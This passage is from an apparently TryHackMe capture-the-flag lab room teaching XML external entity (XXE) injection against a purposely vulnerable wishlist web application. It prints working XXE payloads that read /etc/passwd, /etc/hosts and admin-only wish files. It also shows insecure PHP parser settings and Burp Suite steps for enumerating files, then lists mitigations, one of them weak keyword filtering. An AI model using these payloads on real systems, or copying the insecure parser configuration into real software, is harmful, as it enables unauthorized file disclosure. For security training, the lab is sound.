vulnerability. XXE is an attack that takes advantage of how XML parsers handle
external entities. When a web application processes an XML file that contains an
external entity, the parser attempts to load or execute whatever resource the
entity points to. If necessary sanitisation is not in place, the attacker may
point the entity to any malicious source/code causing the undesired behaviour of
the web app.
For example, if a vulnerable XML parser processes this external entity
definition:
<!DOCTYPE people[
<!ENTITY thmFile SYSTEM "file:///etc/passwd">
]>
<people>
<name>Glitch</name>
<address>&thmFile;</address>
<email>glitch@wareville.com</email>
<phone>111000</phone>
</people>
Here, the entity &thmFile; refers to the sensitive file /etc/passwd on a system.
When the XML is processed, the parser will try to load and display the contents
of that file, exposing sensitive information to the attacker.
In the upcoming tasks, we will examine how XXE works and how to exploit it.
Connecting to the Machine
Before moving forward, review the questions in the connection card shown below:
Click on the green Start Machine button below to start the virtual
machine. While the virtual machine starts, click on the Start AttackBox button
at the top of the page and browse Wareville's WishVille application
at http://MACHINE_IP. Please wait 1-2 minutes after the system boots completely
to let the auto scripts run successfully.
Start Machine
Practical
Now that you understand the basic concepts related to XML and XXE, we will
analyse an application that allows users to view and add products to their carts
and perform the checkout activity. You can access the Wareville application
hosted on http://MACHINE_IP. This application allows users to request their
Christmas wishes.
Flow of the Application
As a penetration tester, it is important to first analyse the flow of the
application. First, the user will browse through the products and add items of
interest to their wishlist at http://MACHINE_IP/product.php. Click on the Add to
Wishlist under Wareville's Jolly Cap, as shown below:
After adding products to the wishlist, click the Cart button or visit
http://MACHINE_IP/cart.php to see the products added to the cart. On the
Cart page, click the Proceed to Checkout button to buy the items as shown below:
On the checkout page, the user will be prompted to enter his name and address as
shown below:
Enter any name of your choice and address, and click on Complete Checkout to
place the wish. Once you complete the wish, you will be shown the message
"Wish successful. Your wish has been saved as Wish #21", as shown below:
Wish #21 indicates the wishes placed by a user on the website. Once you click on
Wish #21, you will see a forbidden page because the details are only accessible
to admins. But can we try to bypass this and access other people's wishes? This
is what we will try to perform in this task.
Intercepting the Request
Before discussing exploiting XXE on the web, let's learn how to intercept the
request. First, we need to configure the environment so that, as a pentester,
all web traffic from our browser is routed through Burp Suite. This allows us to
see and manipulate the requests as we browse.
We will use Burp Suite, a powerful web vulnerability scanner, to intercept and
modify requests for this exploitation. You can access Burp Suite in the
AttackBox. On the desktop of the AttackBox, you will see a Burp Suite icon as
shown below:
Once you click the icon, Burp Suite will open with an introductory screen. You
will see a message like "Welcome to Burp Suite". Click on the Next button.
On the next screen, you will have the option to Start Burp. Click on the Start
Burp button to start the tool.
Once Burp Suite has started, you will see its main interface with different
tabs, such as Proxy, Intruder, Repeater and others.
Inside Burp Suite, click the Settings tab at the top right. You will see Burp's
browser option available under the Tools section. Enable Allow Burp's browser to
run without a sandbox option and click on the close icon on the top right corner
of the Settings tab as shown below:
After allowing the browser to run without a sandbox, we would now be able to
start the browser with pre-configured Burp Suite's proxy. Navigate to the Open
browser option located at the Proxy -> Intercept section of Burp. Open the
browser by clicking the Open browser as shown below and browse the
URL http://MACHINE_IP, so that all requests are intercepted:
Once you browse the URL, all the requests are intercepted and can be seen under
the Proxy->HTTP history tab.
What is Happening in the Backend?
Now, when you visit the URL, http://MACHINE_IP/product.php, and click Add to
Wishlist, an AJAX call is made to wishlist.php with the following XML as input.
<wishlist>
<user_id>1</user_id>
<item>
<product_id>1</product_id>
</item>
</wishlist>
In the above XML, <product_id> tag contains the ID of the product, which is 1 in
this case. Now, let's review the Add to Wishlist request logged in Burp Suite's
HTTP History option under the proxy tab. As discussed above, the request
contains XML being forwarded as a POST request, as shown below:
This wishlist.php accepts the request and parses the request using the following
code:
<?php
..
...
libxml_disable_entity_loader(false);
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);
...
..
echo "Item added to your wishlist successfully.";
?>
Preparing the Payload
When a user sends specially crafted XML data to the application, the line
libxml_disable_entity_loader(false) allows the XML parser to load external
entities. This means the XML input can include external file references or
requests to remote servers. When the XML is processed by simplexml_load_string
with the LIBXML_NOENT option, the web app resolves external entities, allowing
attackers access to sensitive files or allowing them to make unintended requests
from the server.
What if we update the XML request to include references for external entities?
We will use the following XML instead of the above XML:
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
When we send this updated XML payload, the first two lines introduce an external
entity called payload. The line <!ENTITY payload SYSTEM "/etc/hosts"> tells the
XML parser to replace the &payload; reference with the contents of the file
/etc/hosts on the server. When the XML is processed, instead of a normal
product_id, the application will try to load and include the contents of the
file specified in the entity (/etc/hosts).
Exploitation
Now, let's perform the exploitation by repeating the request we captured
earlier. The Burp Suite tool has a feature known as Repeater that allows you to
send multiple HTTP requests. We will use this feature to duplicate our HTTP POST
request and send it multiple times to exploit the vulnerability. Right-click on
the wishlist.php POST request and click on Send to Repeater.
Now, switch to the Repeater tab, where you'll find the POST request that needs
to be modified. We will update the XML payload with the new data as shown below
and then send the modified request:
Place the mouse cursor inside the request in the Repeater tab in Burp Suite and
press Ctrl+V or paste the payload in the above-highlighted area.
When we clicked Send, the server processed the malicious XML payload, which
included the external entity reference to /etc/hosts. As a result, the
wishlist.php responded with the contents of the /etc/hosts file, leading to an
XXE vulnerability.
Time for Some Action
Now that you've identified a vulnerability in the application, it's time to see
it in action! McSkidy Software has tasked us with finding loopholes, and we've
successfully uncovered one in the wishlist.php endpoint. But our work doesn't
end there—let's take it a step further and assess the potential impact this
vulnerability could have on the application.
Earlier, we discovered a page accessible only by administrators, which seems
like an exciting target. What if we could use the vulnerability we've found to
access sensitive information, like the wishes placed by the townspeople?
Now that our objective is clear, let's leverage the vulnerability we discovered
to read the contents of each wishes page and demonstrate the full extent of this
flaw to help McSkidy secure the platform. To get started, let's recall the page
that is only accessible by admins - /wishes/wish_1.txt. Using this path, we just
need to guess the potential absolute path of the file. Typically, web
applications are hosted on /var/www/html. With that in mind, let's build our new
payload to read the wishes while leveraging the vulnerability.
Note: Not all web applications use the path /var/www/html, but web servers
typically use it.
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
Surprisingly, we got lucky that our assumption worked. The next thing to do is
see whether we can view more wishes using our discovery. To do this, let's try
replacing the wish_1.txt with wish_2.txt.
As a result, we were able to view the next wish. You may observe that we just
incremented the number by one. Given this, you may continue checking the other
wishes and see all the wishes stored in the application.
After iterating through the wishes, we have proved the potential impact of the
vulnerability, and anyone who leverages this could read the wishes submitted by
the townspeople of Wareville.
Conclusion
It was confirmed that the application was vulnerable, and the developers were
not at fault since they only wanted to give the townspeople something before
Christmas. However, it became evident that bypassing security testing led to an
application that did not securely handle incoming requests.
As soon as the vulnerability was discovered, McSkidy promptly coordinated with
the developers to implement the necessary mitigations. The following proactive
approach helped to address the potential risks against XXE attacks:
* Disable External Entity Loading: The primary fix is to disable external
entity loading in your XML parser. In PHP, for example, you can prevent XXE
by setting libxml_disable_entity_loader(true) before processing the XML.
* Validate and Sanitise User Input: Always validate and sanitise the XML input
received from users. This ensures that only expected data is processed,
reducing the risk of malicious content being included in the request. For
example, remove suspicious keywords like /etc/host, /etc/passwd, etc, from
the request.
After discovering the vulnerability, McSkidy immediately remembered that a
CHANGELOG file exists within the web application, stored at the following
endpoint: http://MACHINE_IP/CHANGELOG. After checking, it can be seen that
someone pushed the vulnerable code within the application after Software's team.
With this discovery, McSkidy still couldn't confirm whether the Mayor
intentionally made the application vulnerable. However, the Mayor had already
become suspicious, and McSkidy began to formulate theories about his possible
involvement.
Answer the questions below
What is the flag discovered after navigating through the wishes?
Login to answer..Hint
What is the flag seen on the possible proof of sabotage?
Login to answer..
If you want to learn more about the XXE injection attack, check out
the XXE room!
Login to answer..
Following McSkidy's advice, Software recently hardened the server. It used to
have many unneeded open ports, but not anymore. Not that this matters in any
way.
Login to answer..
Created by
tryhackme
ar33zy
cmnatic
Dex01
timtaylor
munra
hk
strategos
Fontaene
SecurityNomad
am03bam4n
umairalizafar
hadrian3689
melmols
Maxablancas
1337rce
MartaStrzelec
DrGonz0
h4sh3m00
l000g1c
rePl4stic
Aashir.Masood
str3g4tt4
Room Type
Free Room. Anyone can deploy virtual machines in the room (without being
subscribed)!
Users in Room
102.760
Created
today
LEARNING
* Hands-on labs
* For Business
* For Education
* Competitive Hacking
RESOURCES
* About Us
* Newsroom
* Blog
* Glossary
* Work at TryHackMe
* Careers in Cyber
SHOP
* Buy Vouchers
* Swag Shop
GET IN TOUCH
* Contact Us
* Forum
We're a gamified, hands-on cyber security training platform that you can access
through your browser.
128 City Road, London, United Kingdom, EC1V 2NX
Copyright TryHackMe 2018-2024
Privacy PolicyTerms of UseAI Terms of UseAcceptable Use PolicyCookie Policy
Exit split view
We use cookies to ensure you get the best user experience. For more information
contact us.
Read moreGot it!